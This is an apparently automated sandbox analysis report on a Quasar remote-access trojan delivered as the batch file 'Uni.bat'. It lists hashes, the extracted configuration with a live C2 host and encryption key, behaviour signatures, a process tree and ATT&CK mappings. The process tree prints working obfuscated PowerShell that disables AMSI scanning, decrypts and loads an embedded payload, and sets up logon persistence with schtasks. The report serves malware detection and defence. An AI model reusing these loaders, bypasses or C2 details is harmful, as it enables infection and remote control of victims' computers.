Resubmissions

10-05-2024 16:59

240510-vhw48sba59 10

08-05-2024 18:24

240508-w2gz4aha3z 10

08-05-2024 17:08

240508-vnlkpagh86 10

Analysis

  • max time kernel
    1800s
  • max time network
    1171s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-05-2024 18:24

General

  • Target

    Uni.bat

  • Size

    301KB

  • MD5

    1f089d9bb03dad6a421dc626a1a1388d

  • SHA1

    44b708c87c743b09c3380427aa0c64e196438d76

  • SHA256

    d1c5a6ee28141a729b788a725748d718c2cf26d6cf66c19a524072eeb03cf334

  • SHA512

    fd6c6e5588e588e482a15bfe7a5f4608fe85452916b812319336bf422b07a3f76ef7415b64d99bc7f624e57aa362c388576db529e064a3dfbbc4ec01aebec324

  • SSDEEP

    6144:UDAQODtb/MLJcwze2hz1uQ1VEqPfvBaidW+wYHlad/vb7V1:UDROhbMNcE7hv1VLZtMTK+/jJ1

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

SLAVE

C2

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-dOMA5C0pQTTpKjVsCp

Attributes
  • encryption_key

    UBXs44u6E81wxBGZxQHk

  • install_name

    $sxr-powershell.exe

  • log_directory

    $SXR-KEYLOGS

  • reconnect_delay

    3000

  • startup_key

    $sxr-powershell

  • subdirectory

    $sxr-seroxen2

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Downloads MZ/PE file
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 18 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:608
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:332
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{afd0a5ab-c4cd-4c38-b0ff-7fbe89c0ce7c}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3256
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:672
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:952
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:404
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:912
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1080
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1120
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1176
                    • C:\Windows\system32\taskhostw.exe
                      taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                      2⤵
                        PID:2872
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:PPzqUSzVsPtL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hZNjFCcMRSwRFL,[Parameter(Position=1)][Type]$RCfkPuoRvK)$VlvXGTSTDlu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+'l'+'e'+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+'D'+''+'e'+''+[Char](108)+''+'e'+''+[Char](103)+''+'a'+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+'M'+[Char](101)+'mo'+'r'+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+'ul'+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+'e'+'l'+''+[Char](101)+''+'g'+''+[Char](97)+''+'t'+''+'e'+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+[Char](108)+''+[Char](97)+'ss'+','+'Pu'+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+'e'+''+'a'+'le'+'d'+''+[Char](44)+''+[Char](65)+'n'+[Char](115)+''+'i'+''+[Char](67)+'la'+[Char](115)+'s'+[Char](44)+''+[Char](65)+'u'+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$VlvXGTSTDlu.DefineConstructor(''+'R'+'T'+[Char](83)+''+'p'+'ec'+[Char](105)+'al'+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+''+[Char](44)+'H'+'i'+''+[Char](100)+'eBy'+[Char](83)+'i'+'g'+''+[Char](44)+'P'+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$hZNjFCcMRSwRFL).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+[Char](44)+'M'+'a'+'na'+'g'+''+'e'+''+'d'+'');$VlvXGTSTDlu.DefineMethod('I'+[Char](110)+'vo'+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+[Char](44)+'H'+[Char](105)+''+'d'+''+'e'+''+'B'+'y'+[Char](83)+'i'+[Char](103)+''+','+''+'N'+''+'e'+''+'w'+''+[Char](83)+'lo'+[Char](116)+''+','+'V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+'l'+'',$RCfkPuoRvK,$hZNjFCcMRSwRFL).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+'Ma'+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $VlvXGTSTDlu.CreateType();}$SWGrhrMEoFGTd=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+[Char](115)+''+[Char](116)+''+[Char](101)+'m.'+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+'s'+[Char](111)+''+[Char](102)+'t'+'.'+''+[Char](87)+''+'i'+''+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+'Un'+'s'+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+'t'+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+'t'+[Char](104)+''+'o'+''+[Char](100)+''+'s'+'');$GedGCYOKTCEyKB=$SWGrhrMEoFGTd.GetMethod(''+[Char](71)+'et'+[Char](80)+'roc'+[Char](65)+''+'d'+''+'d'+''+[Char](114)+''+'e'+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+'ic'+','+''+'S'+''+[Char](116)+''+'a'+''+[Char](116)+''+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$NqrJFuMdGcRJwyGopRd=PPzqUSzVsPtL @([String])([IntPtr]);$MgkUGTqUnQqKQxqAaUBZhA=PPzqUSzVsPtL @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$iilCRNHZMyo=$SWGrhrMEoFGTd.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e'+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+'r'+''+'n'+''+[Char](101)+''+[Char](108)+''+'3'+''+[Char](50)+''+[Char](46)+''+[Char](100)+'ll')));$nmzkbNUVCwFMDf=$GedGCYOKTCEyKB.Invoke($Null,@([Object]$iilCRNHZMyo,[Object](''+[Char](76)+''+'o'+''+[Char](97)+'d'+[Char](76)+''+'i'+'b'+[Char](114)+''+[Char](97)+''+'r'+''+'y'+''+[Char](65)+'')));$lJdXVcedQMAcefCaU=$GedGCYOKTCEyKB.Invoke($Null,@([Object]$iilCRNHZMyo,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+'al'+[Char](80)+'r'+[Char](111)+''+'t'+''+'e'+''+[Char](99)+''+'t'+'')));$wqgNFAO=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nmzkbNUVCwFMDf,$NqrJFuMdGcRJwyGopRd).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+[Char](105)+''+[Char](46)+''+'d'+'l'+[Char](108)+'');$XxsucYXQPFWNIhILi=$GedGCYOKTCEyKB.Invoke($Null,@([Object]$wqgNFAO,[Object](''+[Char](65)+''+[Char](109)+'s'+'i'+''+[Char](83)+'ca'+[Char](110)+''+[Char](66)+''+[Char](117)+'f'+'f'+''+[Char](101)+''+'r'+'')));$DGQpQoJUmP=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lJdXVcedQMAcefCaU,$MgkUGTqUnQqKQxqAaUBZhA).Invoke($XxsucYXQPFWNIhILi,[uint32]8,4,[ref]$DGQpQoJUmP);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$XxsucYXQPFWNIhILi,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lJdXVcedQMAcefCaU,$MgkUGTqUnQqKQxqAaUBZhA).Invoke($XxsucYXQPFWNIhILi,[uint32]8,0x20,[ref]$DGQpQoJUmP);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+[Char](84)+''+[Char](87)+''+'A'+'RE').GetValue(''+[Char](36)+''+'7'+''+[Char](55)+''+[Char](115)+''+[Char](116)+'ag'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:2604
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                      1⤵
                      • Drops file in System32 directory
                      PID:1188
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                      1⤵
                        PID:1268
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                        1⤵
                          PID:1328
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                          1⤵
                            PID:1372
                          • C:\Windows\System32\svchost.exe
                            C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                            1⤵
                              PID:1452
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                              1⤵
                                PID:1468
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                1⤵
                                  PID:1524
                                  • C:\Windows\system32\sihost.exe
                                    sihost.exe
                                    2⤵
                                    • Modifies registry class
                                    PID:2680
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                  1⤵
                                    PID:1564
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                    1⤵
                                      PID:1640
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                      1⤵
                                        PID:1692
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                        1⤵
                                          PID:1728
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                          1⤵
                                            PID:1792
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                            1⤵
                                              PID:1872
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1944
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                1⤵
                                                  PID:1952
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                  1⤵
                                                    PID:1516
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                    1⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1772
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                    1⤵
                                                      PID:1908
                                                    • C:\Windows\System32\spoolsv.exe
                                                      C:\Windows\System32\spoolsv.exe
                                                      1⤵
                                                        PID:2144
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                        1⤵
                                                          PID:2236
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                          1⤵
                                                            PID:2416
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                            1⤵
                                                              PID:2524
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                              1⤵
                                                                PID:2532
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                1⤵
                                                                  PID:2692
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                  1⤵
                                                                  • Drops file in System32 directory
                                                                  PID:2748
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                  1⤵
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2816
                                                                • C:\Windows\sysmon.exe
                                                                  C:\Windows\sysmon.exe
                                                                  1⤵
                                                                    PID:2824
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                    1⤵
                                                                      PID:2832
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                      1⤵
                                                                        PID:2860
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                        1⤵
                                                                          PID:3064
                                                                        • C:\Windows\system32\wbem\unsecapp.exe
                                                                          C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                          1⤵
                                                                            PID:3092
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                            1⤵
                                                                              PID:3444
                                                                            • C:\Windows\Explorer.EXE
                                                                              C:\Windows\Explorer.EXE
                                                                              1⤵
                                                                              • Modifies registry class
                                                                              • Suspicious use of UnmapMainImage
                                                                              PID:3552
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
                                                                                2⤵
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:3356
                                                                                • C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe
                                                                                  "Uni.bat.exe" -noprofile -ep bypass -command $sQWxo = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($wuunU in $sQWxo) { if ($wuunU.StartsWith(':: ')) { $Gefee = $wuunU.Substring(3); break; }; };$BRHkO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($Gefee);$UoJkv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('llI7MHEN3rnuJm+OhoiaRW5vgXl8RYhNtONXY+rZGh8=');for ($i = 0; $i -le $BRHkO.Length - 1; $i++) { $BRHkO[$i] = ($BRHkO[$i] -bxor $UoJkv[$i % $UoJkv.Length]); };$mAGPa = New-Object System.IO.MemoryStream(, $BRHkO);$OtAiB = New-Object System.IO.MemoryStream;$IbMMP = New-Object System.IO.Compression.GZipStream($mAGPa, [IO.Compression.CompressionMode]::Decompress);$IbMMP.CopyTo($OtAiB);$IbMMP.Dispose();$mAGPa.Dispose();$OtAiB.Dispose();$BRHkO = $OtAiB.ToArray();$KXfoP = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($BRHkO);$Ujyzm = $KXfoP.EntryPoint;$Ujyzm.Invoke($null, (, [string[]] ('')))
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:628
                                                                                  • C:\Windows\SYSTEM32\schtasks.exe
                                                                                    "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" /rl HIGHEST /f
                                                                                    4⤵
                                                                                    • Creates scheduled task(s)
                                                                                    PID:1556
                                                                                  • C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"
                                                                                    4⤵
                                                                                    • Executes dropped EXE
                                                                                    • Modifies system certificate store
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:3840
                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      5⤵
                                                                                        PID:5048
                                                                                    • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                      4⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:2888
                                                                                    • C:\Windows\SYSTEM32\SCHTASKS.exe
                                                                                      "SCHTASKS.exe" /create /tn "$77" /tr "''" /sc onlogon /rl HIGHEST
                                                                                      4⤵
                                                                                      • Creates scheduled task(s)
                                                                                      PID:3188
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                1⤵
                                                                                  PID:3672
                                                                                • C:\Windows\system32\DllHost.exe
                                                                                  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                  1⤵
                                                                                    PID:3844
                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                    1⤵
                                                                                    • Modifies registry class
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:4000
                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                    1⤵
                                                                                      PID:3644
                                                                                    • C:\Windows\System32\svchost.exe
                                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                      1⤵
                                                                                        PID:1512
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                        1⤵
                                                                                          PID:4016
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                          1⤵
                                                                                          • Modifies data under HKEY_USERS
                                                                                          PID:5000
                                                                                        • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                          "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                          1⤵
                                                                                          • Drops file in System32 directory
                                                                                          • Modifies data under HKEY_USERS
                                                                                          PID:1820
                                                                                        • C:\Windows\system32\SppExtComObj.exe
                                                                                          C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                          1⤵
                                                                                            PID:4676
                                                                                          • C:\Windows\System32\svchost.exe
                                                                                            C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                            1⤵
                                                                                              PID:4416
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                              1⤵
                                                                                              • Modifies data under HKEY_USERS
                                                                                              PID:3908
                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                              1⤵
                                                                                              • Drops file in System32 directory
                                                                                              PID:3680
                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                              1⤵
                                                                                                PID:3244
                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                1⤵
                                                                                                  PID:4176
                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                  1⤵
                                                                                                  • Modifies registry class
                                                                                                  PID:2056
                                                                                                • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                  1⤵
                                                                                                  • Checks BIOS information in registry
                                                                                                  • Checks SCSI registry key(s)
                                                                                                  • Enumerates system info in registry
                                                                                                  PID:3396
                                                                                                • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                  C:\Windows\System32\WaaSMedicAgent.exe 17c7745bec92abb2359db07b36c3684b DQVqdNQEwUS5Fp3Kkr1hjw.0.1.0.0.0
                                                                                                  1⤵
                                                                                                  • Sets service image path in registry
                                                                                                  PID:3252
                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    2⤵
                                                                                                      PID:1616
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                    1⤵
                                                                                                    • Drops file in Windows directory
                                                                                                    PID:2408
                                                                                                  • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                    C:\Windows\servicing\TrustedInstaller.exe
                                                                                                    1⤵
                                                                                                      PID:544
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                      1⤵
                                                                                                        PID:2180
                                                                                                      • C:\Windows\System32\mousocoreworker.exe
                                                                                                        C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                        1⤵
                                                                                                        • Checks processor information in registry
                                                                                                        • Enumerates system info in registry
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:3188
                                                                                                      • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                        "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                        1⤵
                                                                                                          PID:1700
                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          1⤵
                                                                                                          • Modifies registry class
                                                                                                          PID:4832
                                                                                                        • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                          "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                          1⤵
                                                                                                            PID:2716
                                                                                                          • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                            "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                            1⤵
                                                                                                              PID:2472
                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                              1⤵
                                                                                                              • Modifies registry class
                                                                                                              PID:1140
                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                              1⤵
                                                                                                                PID:1968
                                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                                C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                1⤵
                                                                                                                  PID:2724
                                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                  1⤵
                                                                                                                    PID:3120
                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                    1⤵
                                                                                                                      PID:212

                                                                                                                    Network

                                                                                                                    MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                    Execution

                                                                                                                    Scheduled Task/Job

                                                                                                                    1
                                                                                                                    T1053

                                                                                                                    Persistence

                                                                                                                    Boot or Logon Autostart Execution

                                                                                                                    1
                                                                                                                    T1547

                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                    1
                                                                                                                    T1547.001

                                                                                                                    Scheduled Task/Job

                                                                                                                    1
                                                                                                                    T1053

                                                                                                                    Privilege Escalation

                                                                                                                    Boot or Logon Autostart Execution

                                                                                                                    1
                                                                                                                    T1547

                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                    1
                                                                                                                    T1547.001

                                                                                                                    Scheduled Task/Job

                                                                                                                    1
                                                                                                                    T1053

                                                                                                                    Defense Evasion

                                                                                                                    Modify Registry

                                                                                                                    2
                                                                                                                    T1112

                                                                                                                    Subvert Trust Controls

                                                                                                                    1
                                                                                                                    T1553

                                                                                                                    Install Root Certificate

                                                                                                                    1
                                                                                                                    T1553.004

                                                                                                                    Discovery

                                                                                                                    Query Registry

                                                                                                                    5
                                                                                                                    T1012

                                                                                                                    System Information Discovery

                                                                                                                    4
                                                                                                                    T1082

                                                                                                                    Peripheral Device Discovery

                                                                                                                    1
                                                                                                                    T1120

                                                                                                                    Command and Control

                                                                                                                    Web Service

                                                                                                                    1
                                                                                                                    T1102

                                                                                                                    Replay Monitor

                                                                                                                    Loading Replay Monitor...

                                                                                                                    Downloads

                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\V01.chk
                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      MD5

                                                                                                                      f998b862f63c26ab4c47c2f6f1f13523

                                                                                                                      SHA1

                                                                                                                      88d04291f6172c413ca47567b9d29c9590f3e6cd

                                                                                                                      SHA256

                                                                                                                      9bf6ff83a47f28b3eff06f938e70a563406edc2b5ce8d69d2b592e6586b3e4ca

                                                                                                                      SHA512

                                                                                                                      26f245e7da0afa7af87f78be643133a02ec68a51a50002b86f448099007eaffc587ce8cf9d5f3553226edef72b1192ced31dd56a229a28b64a49397503d6e97e

